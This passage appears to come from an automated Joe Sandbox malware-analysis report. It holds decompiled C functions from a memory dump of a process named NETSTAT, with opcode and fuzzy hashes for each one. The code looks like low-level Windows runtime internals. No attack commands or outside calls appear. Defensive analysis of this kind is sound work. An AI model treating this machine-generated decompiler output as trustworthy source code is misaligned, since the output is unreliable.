                                      				}
                                      				return E02EAB640(_t11, _t17, _v8 ^ _t29, 0x2e4bf15, _t27, _t28);
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac07a33976de494ba1e06835c3f4731abddb4d85fee76065f0eba147aea63345
                                      • Instruction ID: 7330d181f9ddd84682c5afba4537aaa1d463b8c4d12711306d07abcdf3f34fe2
                                      • Opcode Fuzzy Hash: ac07a33976de494ba1e06835c3f4731abddb4d85fee76065f0eba147aea63345
                                      • Instruction Fuzzy Hash: 0801A731BD05189BCB14DB69D815ABFB7AAEF402B4FD590A9A9169B240DE30ED01CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02F31074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                      				char _v8;
                                      				void* _v11;
                                      				unsigned int _v12;
                                      				void* _v15;
                                      				void* __esi;
                                      				void* __ebp;
                                      				char* _t16;
                                      				signed int* _t35;
                                      
                                      				_t22 = __ebx;
                                      				_t35 = __ecx;
                                      				_v8 = __edx;
                                      				_t13 =  !( *__ecx) + 1;
                                      				_v12 =  !( *__ecx) + 1;
                                      				if(_a4 != 0) {
                                      					E02F3165E(__ebx, 0x2f58ae4, (__edx -  *0x2f58b04 >> 0x14) + (__edx -  *0x2f58b04 >> 0x14), __edi, __ecx, (__edx -  *0x2f58b04 >> 0x14) + (__edx -  *0x2f58b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                      				}
                                      				E02F2AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                      				if(E02E87D50() == 0) {
                                      					_t16 = 0x7ffe0388;
                                      				} else {
                                      					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      				}
                                      				if( *_t16 != 0) {
                                      					_t16 = E02F1FE3F(_t22, _t35, _v8, _v12);
                                      				}
                                      				return _t16;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5bbb2a49b0053e6506bea9d483f198fac1884db2376daccc0d5a57879712af79
                                      • Instruction ID: da4def3506eb7913dab71ef2a1fc9a81ed050dc44561690c0827a7ecbffbfcf1
                                      • Opcode Fuzzy Hash: 5bbb2a49b0053e6506bea9d483f198fac1884db2376daccc0d5a57879712af79
                                      • Instruction Fuzzy Hash: AE012872504741ABC711EB68C900B1BB7D6AB84794F04C619FA8993690EE30D450CFA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E7B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                      				signed char _t11;
                                      				signed char* _t12;
                                      				intOrPtr _t24;
                                      				signed short* _t25;
                                      
                                      				_t25 = __edx;
                                      				_t24 = __ecx;
                                      				_t11 = ( *[fs:0x30])[0x50];
                                      				if(_t11 != 0) {
                                      					if( *_t11 == 0) {
                                      						goto L1;
                                      					}
                                      					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                      					L2:
                                      					if( *_t12 != 0) {
                                      						_t12 =  *[fs:0x30];
                                      						if((_t12[0x240] & 0x00000004) == 0) {
                                      							goto L3;
                                      						}
                                      						if(E02E87D50() == 0) {
                                      							_t12 = 0x7ffe0385;
                                      						} else {
                                      							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                      						}
                                      						if(( *_t12 & 0x00000020) == 0) {
                                      							goto L3;
                                      						}
                                      						return E02EE7016(_a4, _t24, 0, 0, _t25, 0);
                                      					}
                                      					L3:
                                      					return _t12;
                                      				}
                                      				L1:
                                      				_t12 = 0x7ffe0384;
                                      				goto L2;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                      • Instruction ID: 11d7268033886074e6e85cc38c2e6e51a8b95160e9a30ba5f4fbc33b9f5162e2
                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                      • Instruction Fuzzy Hash: 29017C72280984DFD322AB9CC988F6677D8EF46758F1990A9F919CBB91D728DC41C620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 59%
                                      			E02F1FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                      				signed int _v12;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				short _v58;
                                      				char _v64;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed char* _t18;
                                      				intOrPtr _t24;
                                      				intOrPtr _t30;
                                      				intOrPtr _t31;
                                      				signed int _t32;
                                      
                                      				_t29 = __edx;
                                      				_t24 = __ebx;
                                      				_v12 =  *0x2f5d360 ^ _t32;
                                      				_t30 = __edx;
                                      				_t31 = __ecx;
                                      				E02EAFA60( &_v64, 0, 0x30);
                                      				_v24 = _a4;
                                      				_v32 = _t31;
                                      				_v28 = _t30;
                                      				_v58 = 0x266;
                                      				if(E02E87D50() == 0) {
                                      					_t18 = 0x7ffe0388;
                                      				} else {
                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      				}
                                      				_push( &_v64);
                                      				_push(0x10);
                                      				_push(0x20402);
                                      				_push( *_t18 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dc948b08a9900ae57899a6c5cd1a2275b33990b54cda9118355280069b435516
                                      • Instruction ID: 030d7f6b6941f2614f2ee6ecd5d2f9f89c683fd372e374a2aa0b2c14756a0037
                                      • Opcode Fuzzy Hash: dc948b08a9900ae57899a6c5cd1a2275b33990b54cda9118355280069b435516
                                      • Instruction Fuzzy Hash: EF018471E4121CABDB14DBA9D845FAEB7B8EF45700F404166FA05AB290EA70EA01CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 59%
                                      			E02F1FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                      				signed int _v12;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				short _v58;
                                      				char _v64;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed char* _t18;
                                      				intOrPtr _t24;
                                      				intOrPtr _t30;
                                      				intOrPtr _t31;
                                      				signed int _t32;
                                      
                                      				_t29 = __edx;
                                      				_t24 = __ebx;
                                      				_v12 =  *0x2f5d360 ^ _t32;
                                      				_t30 = __edx;
                                      				_t31 = __ecx;
                                      				E02EAFA60( &_v64, 0, 0x30);
                                      				_v24 = _a4;
                                      				_v32 = _t31;
                                      				_v28 = _t30;
                                      				_v58 = 0x267;
                                      				if(E02E87D50() == 0) {
                                      					_t18 = 0x7ffe0388;
                                      				} else {
                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      				}
                                      				_push( &_v64);
                                      				_push(0x10);
                                      				_push(0x20402);
                                      				_push( *_t18 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00f010d6bd52836191e6e13553c5ffb446b5d2bce601d81d2de8910de3f7a5a4
                                      • Instruction ID: 9ea1c030e948042041f535d66aa149edaae868026ed2195b0cea97218ca8085d
                                      • Opcode Fuzzy Hash: 00f010d6bd52836191e6e13553c5ffb446b5d2bce601d81d2de8910de3f7a5a4
                                      • Instruction Fuzzy Hash: E0018471E41318ABDB14DFA9D855FAEB7B9EF44704F008066B905AB291DA70E901CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E02F38A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				signed int _v12;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				short _v66;
                                      				char _v72;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed char* _t18;
                                      				signed int _t32;
                                      
                                      				_t29 = __edx;
                                      				_v12 =  *0x2f5d360 ^ _t32;
                                      				_t31 = _a8;
                                      				_t30 = _a12;
                                      				_v66 = 0x1c20;
                                      				_v40 = __ecx;
                                      				_v36 = __edx;
                                      				_v32 = _a4;
                                      				_v28 = _a8;
                                      				_v24 = _a12;
                                      				if(E02E87D50() == 0) {
                                      					_t18 = 0x7ffe0386;
                                      				} else {
                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      				}
                                      				_push( &_v72);
                                      				_push(0x14);
                                      				_push(0x20402);
                                      				_push( *_t18 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9a3a11800e5f49ec9b6ce3428b08658211dbb3e2b5a182ec0f2e85ff093b454d
                                      • Instruction ID: 619b702f813294b2364922db5f3be26bbcc98d94c109bd1189f4ed192d5c5a57
                                      • Opcode Fuzzy Hash: 9a3a11800e5f49ec9b6ce3428b08658211dbb3e2b5a182ec0f2e85ff093b454d
                                      • Instruction Fuzzy Hash: 7A012C71A4121CAFCB01DFA9D9419AEB7B8EF49350F10405AFA05EB381E634A900CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E02F38ED6(intOrPtr __ecx, intOrPtr __edx) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				short _v62;
                                      				char _v68;
                                      				signed char* _t29;
                                      				intOrPtr _t35;
                                      				intOrPtr _t41;
                                      				intOrPtr _t42;
                                      				signed int _t43;
                                      
                                      				_t40 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t43;
                                      				_v28 = __ecx;
                                      				_v62 = 0x1c2a;
                                      				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                      				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                      				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                      				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                      				_v24 = __edx;
                                      				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                      				if(E02E87D50() == 0) {
                                      					_t29 = 0x7ffe0386;
                                      				} else {
                                      					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      				}
                                      				_push( &_v68);
                                      				_push(0x1c);
                                      				_push(0x20402);
                                      				_push( *_t29 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 32a7621aee0758e5d0749429a5b7440fed50e50d9cc4678a2459143776e64935
                                      • Instruction ID: 7e06e14cd19d246aa001655cfe475d152a4763b7a1b043ddc7571c59c5e70472
                                      • Opcode Fuzzy Hash: 32a7621aee0758e5d0749429a5b7440fed50e50d9cc4678a2459143776e64935
                                      • Instruction Fuzzy Hash: 09110C70E402199FDB04DFA8D541AAEF7F4BB08300F1482AAE519EB382E6349940CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E6DB60(signed int __ecx) {
                                      				intOrPtr* _t9;
                                      				void* _t12;
                                      				void* _t13;
                                      				intOrPtr _t14;
                                      
                                      				_t9 = __ecx;
                                      				_t14 = 0;
                                      				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                      					_t13 = 0xc000000d;
                                      				} else {
                                      					_t14 = E02E6DB40();
                                      					if(_t14 == 0) {
                                      						_t13 = 0xc0000017;
                                      					} else {
                                      						_t13 = E02E6E7B0(__ecx, _t12, _t14, 0xfff);
                                      						if(_t13 < 0) {
                                      							L02E6E8B0(__ecx, _t14, 0xfff);
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                      							_t14 = 0;
                                      						} else {
                                      							_t13 = 0;
                                      							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                      						}
                                      					}
                                      				}
                                      				 *_t9 = _t14;
                                      				return _t13;
                                      			}

                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E6B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                      				signed char* _t13;
                                      				intOrPtr _t22;
                                      				char _t23;
                                      
                                      				_t23 = __edx;
                                      				_t22 = __ecx;
                                      				if(E02E87D50() != 0) {
                                      					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                      				} else {
                                      					_t13 = 0x7ffe0384;
                                      				}
                                      				if( *_t13 != 0) {
                                      					_t13 =  *[fs:0x30];
                                      					if((_t13[0x240] & 0x00000004) == 0) {
                                      						goto L3;
                                      					}
                                      					if(E02E87D50() == 0) {
                                      						_t13 = 0x7ffe0385;
                                      					} else {
                                      						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                      					}
                                      					if(( *_t13 & 0x00000020) == 0) {
                                      						goto L3;
                                      					}
                                      					return E02EE7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                      				} else {
                                      					L3:
                                      					return _t13;
                                      				}
                                      			}

                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E02EFFE87(intOrPtr __ecx) {
                                      				signed int _v8;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				short _v54;
                                      				char _v60;
                                      				signed char* _t21;
                                      				intOrPtr _t27;
                                      				intOrPtr _t32;
                                      				intOrPtr _t33;
                                      				intOrPtr _t34;
                                      				signed int _t35;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t35;
                                      				_v16 = __ecx;
                                      				_v54 = 0x1722;
                                      				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                      				_v28 =  *((intOrPtr*)(__ecx + 4));
                                      				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                      				if(E02E87D50() == 0) {
                                      					_t21 = 0x7ffe0382;
                                      				} else {
                                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                      				}
                                      				_push( &_v60);
                                      				_push(0x10);
                                      				_push(0x20402);
                                      				_push( *_t21 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                      			}

                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 48%
                                      			E02F2131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				short _v50;
                                      				char _v56;
                                      				signed char* _t18;
                                      				intOrPtr _t24;
                                      				intOrPtr _t30;
                                      				intOrPtr _t31;
                                      				signed int _t32;
                                      
                                      				_t29 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t32;
                                      				_v20 = _a4;
                                      				_v12 = _a8;
                                      				_v24 = __ecx;
                                      				_v16 = __edx;
                                      				_v50 = 0x1021;
                                      				if(E02E87D50() == 0) {
                                      					_t18 = 0x7ffe0380;
                                      				} else {
                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      				}
                                      				_push( &_v56);
                                      				_push(0x10);
                                      				_push(0x20402);
                                      				_push( *_t18 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                      			}

                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 48%
                                      			E02F38F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				short _v50;
                                      				char _v56;
                                      				signed char* _t18;
                                      				intOrPtr _t24;
                                      				intOrPtr _t30;
                                      				intOrPtr _t31;
                                      				signed int _t32;
                                      
                                      				_t29 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t32;
                                      				_v16 = __ecx;
                                      				_v50 = 0x1c2c;
                                      				_v24 = _a4;
                                      				_v20 = _a8;
                                      				_v12 = __edx;
                                      				if(E02E87D50() == 0) {
                                      					_t18 = 0x7ffe0386;
                                      				} else {
                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      				}
                                      				_push( &_v56);
                                      				_push(0x10);
                                      				_push(0x402);
                                      				_push( *_t18 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                      			}

                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E02F21608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				short _v46;
                                      				char _v52;
                                      				signed char* _t15;
                                      				intOrPtr _t21;
                                      				intOrPtr _t27;
                                      				intOrPtr _t28;
                                      				signed int _t29;
                                      
                                      				_t26 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t29;
                                      				_v12 = _a4;
                                      				_v20 = __ecx;
                                      				_v16 = __edx;
                                      				_v46 = 0x1024;
                                      				if(E02E87D50() == 0) {
                                      					_t15 = 0x7ffe0380;
                                      				} else {
                                      					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      				}
                                      				_push( &_v52);
                                      				_push(0xc);
                                      				_push(0x20402);
                                      				_push( *_t15 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                      			}

                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E8C577(void* __ecx, char _a4) {
                                      				void* __esi;
                                      				void* __ebp;
                                      				void* _t17;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t21;
                                      
                                      				_t18 = __ecx;
                                      				_t21 = __ecx;
                                      				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02E8C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2e411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                      					__eflags = _a4;
                                      					if(__eflags != 0) {
                                      						L10:
                                      						E02F388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                      						L9:
                                      						return 0;
                                      					}
                                      					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                      					if(__eflags == 0) {
                                      						goto L10;
                                      					}
                                      					goto L9;
                                      				} else {
                                      					return 1;
                                      				}
                                      			}

                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E02EA927A(void* __ecx) {
                                      				signed int _t11;
                                      				void* _t14;
                                      
                                      				_t11 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                      				if(_t11 != 0) {
                                      					E02EAFA60(_t11, 0, 0x98);
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                      					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                      					E02EA92C6(_t11, _t14);
                                      				}
                                      				return _t11;
                                      			}






                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                      • Instruction ID: 237b4cfb9c802dc9b5907f1b675fb746b8f715e2bbf17a2db3f4257aea61f9c5
                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                      • Instruction Fuzzy Hash: 33E09B323805406BDB119F55DC94F57775EDF82725F049079B5085E293C6F6ED098BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E02F22073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                      				void* __esi;
                                      				signed char _t3;
                                      				signed char _t7;
                                      				void* _t19;
                                      
                                      				_t17 = __ecx;
                                      				_t3 = E02F1FD22(__ecx);
                                      				_t19 =  *0x2f5849c - _t3; // 0x0
                                      				if(_t19 == 0) {
                                      					__eflags = _t17 -  *0x2f58748; // 0x0
                                      					if(__eflags <= 0) {
                                      						E02F21C06();
                                      						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                      						__eflags = _t3;
                                      						if(_t3 != 0) {
                                      							L5:
                                      							__eflags =  *0x2f58724 & 0x00000004;
                                      							if(( *0x2f58724 & 0x00000004) == 0) {
                                      								asm("int3");
                                      								return _t3;
                                      							}
                                      						} else {
                                      							_t3 =  *0x7ffe02d4 & 0x00000003;
                                      							__eflags = _t3 - 3;
                                      							if(_t3 == 3) {
                                      								goto L5;
                                      							}
                                      						}
                                      					}
                                      					return _t3;
                                      				} else {
                                      					_t7 =  *0x2f58724; // 0x0
                                      					return E02F18DF1(__ebx, 0xc0000374, 0x2f55890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                      				}
                                      			}








                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6041a5f198c13ad58c6acf9ff036f1ec0285066e182237916838e445ea1d0eb2
                                      • Instruction ID: c26aae8ab65e3b362b2f1cf9487b633d792e2e4e861794e1c30a6800601aec15
                                      • Opcode Fuzzy Hash: 6041a5f198c13ad58c6acf9ff036f1ec0285066e182237916838e445ea1d0eb2
                                      • Instruction Fuzzy Hash: 01F0272AC112BC4ADF32AB2435013E27B91CB476D0B491845DF511B208CB3488D7CE10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 43%
                                      			E02F38D34(intOrPtr __ecx, intOrPtr __edx) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				short _v42;
                                      				char _v48;
                                      				signed char* _t12;
                                      				intOrPtr _t18;
                                      				intOrPtr _t24;
                                      				intOrPtr _t25;
                                      				signed int _t26;
                                      
                                      				_t23 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t26;
                                      				_v16 = __ecx;
                                      				_v42 = 0x1c2b;
                                      				_v12 = __edx;
                                      				if(E02E87D50() == 0) {
                                      					_t12 = 0x7ffe0386;
                                      				} else {
                                      					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      				}
                                      				_push( &_v48);
                                      				_push(8);
                                      				_push(0x20402);
                                      				_push( *_t12 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                      			}














                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c57dc633f9f1f0c4c3173ceeed9550a55f255d7a6020bde33399d8672115e632
                                      • Instruction ID: 0503a486d51e6b6fa746a75bdf49da570817b58ba45bad4300baaa08c6986d9a
                                      • Opcode Fuzzy Hash: c57dc633f9f1f0c4c3173ceeed9550a55f255d7a6020bde33399d8672115e632
                                      • Instruction Fuzzy Hash: AEF0BE70E4460CAFDB04EFB8D541A6EB7B4EF58340F508099FA06EB281EA38E900CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 36%
                                      			E02F38B58(intOrPtr __ecx) {
                                      				signed int _v8;
                                      				intOrPtr _v20;
                                      				short _v46;
                                      				char _v52;
                                      				signed char* _t11;
                                      				intOrPtr _t17;
                                      				intOrPtr _t22;
                                      				intOrPtr _t23;
                                      				intOrPtr _t24;
                                      				signed int _t25;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t25;
                                      				_v20 = __ecx;
                                      				_v46 = 0x1c26;
                                      				if(E02E87D50() == 0) {
                                      					_t11 = 0x7ffe0386;
                                      				} else {
                                      					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      				}
                                      				_push( &_v52);
                                      				_push(4);
                                      				_push(0x402);
                                      				_push( *_t11 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                      			}














                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
